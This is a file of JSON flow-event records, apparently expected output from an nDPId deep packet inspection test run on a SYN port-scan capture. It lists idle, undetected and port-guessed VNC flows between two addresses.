+00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1920,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061309,"flow_last_seen":1278275061309,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1801,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1920,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061309,"flow_last_seen":1278275061309,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1801,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":885,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059851,"flow_last_seen":1278275059851,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":34571,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 
+00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":885,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059851,"flow_last_seen":1278275059851,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":34571,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":614,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059456,"flow_last_seen":1278275059456,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":3851,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":614,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059456,"flow_last_seen":1278275059456,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":3851,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":970,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059962,"flow_last_seen":1278275059962,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":34571,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":970,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059962,"flow_last_seen":1278275059962,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":34571,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":590,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059410,"flow_last_seen":1278275059410,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":34572,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 
+00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":590,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059410,"flow_last_seen":1278275059410,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":34572,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":683,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059565,"flow_last_seen":1278275059565,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":3851,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":683,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059565,"flow_last_seen":1278275059565,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":3851,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00649{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":10,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275056276,"flow_last_seen":1278275056276,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":5900,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"VNC","breed":"Acceptable","category":"RemoteAccess"}} +00578{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":10,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275056276,"flow_last_seen":1278275056276,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":5900,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00596{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1046,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060072,"flow_last_seen":1278275060072,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":34573,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 
+00581{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1046,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060072,"flow_last_seen":1278275060072,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":34573,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":665,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059521,"flow_last_seen":1278275059521,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":34572,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":665,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059521,"flow_last_seen":1278275059521,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":34572,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00650{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":838,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059786,"flow_last_seen":1278275059786,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":5901,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"VNC","breed":"Acceptable","category":"RemoteAccess"}} +00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":838,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059786,"flow_last_seen":1278275059786,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":5901,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":453,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059096,"flow_last_seen":1278275059096,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1805,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 
+00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":453,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059096,"flow_last_seen":1278275059096,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1805,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00649{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":21,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275057478,"flow_last_seen":1278275057478,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":5900,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"VNC","breed":"Acceptable","category":"RemoteAccess"}} +00578{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":21,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275057478,"flow_last_seen":1278275057478,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":5900,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1691,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061001,"flow_last_seen":1278275061001,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":9998,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1691,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061001,"flow_last_seen":1278275061001,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":9998,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00596{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1109,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060181,"flow_last_seen":1278275060181,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":34573,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 
+00581{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1109,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060181,"flow_last_seen":1278275060181,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":34573,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1022,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060066,"flow_last_seen":1278275060066,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":5902,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1022,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060066,"flow_last_seen":1278275060066,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":5902,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00650{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":909,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059895,"flow_last_seen":1278275059895,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":5901,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"VNC","breed":"Acceptable","category":"RemoteAccess"}} +00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":909,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059895,"flow_last_seen":1278275059895,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":5901,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":495,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059221,"flow_last_seen":1278275059221,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1805,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 
+00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":495,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059221,"flow_last_seen":1278275059221,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1805,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1766,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061104,"flow_last_seen":1278275061104,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":9998,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1766,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061104,"flow_last_seen":1278275061104,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":9998,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00596{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1534,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060796,"flow_last_seen":1278275060796,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":55055,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00581{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1534,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060796,"flow_last_seen":1278275060796,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":55055,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1083,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060175,"flow_last_seen":1278275060175,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":5902,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 
+00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1083,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060175,"flow_last_seen":1278275060175,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":5902,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":796,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059736,"flow_last_seen":1278275059736,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":9999,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":796,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059736,"flow_last_seen":1278275059736,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":9999,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":103,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058030,"flow_last_seen":1278275058030,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":5903,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":103,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058030,"flow_last_seen":1278275058030,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":5903,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00596{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1791,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061108,"flow_last_seen":1278275061108,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":55056,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 
+00581{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1791,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061108,"flow_last_seen":1278275061108,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":55056,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 